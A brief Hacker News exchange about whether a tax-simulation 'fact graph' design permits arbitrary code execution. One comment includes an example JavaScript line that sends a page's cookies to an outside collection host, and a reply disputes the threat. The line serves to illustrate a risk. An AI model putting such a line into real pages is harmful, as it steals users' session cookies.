Hacker News

catlifeonmars today at 2:46 PM

This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data.

Now let me send you a fact graph that contains:

    fetch(`https://callhome.com/collect?s=${document.cookie}`)

Replies

n_e today at 4:06 PM

The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist.
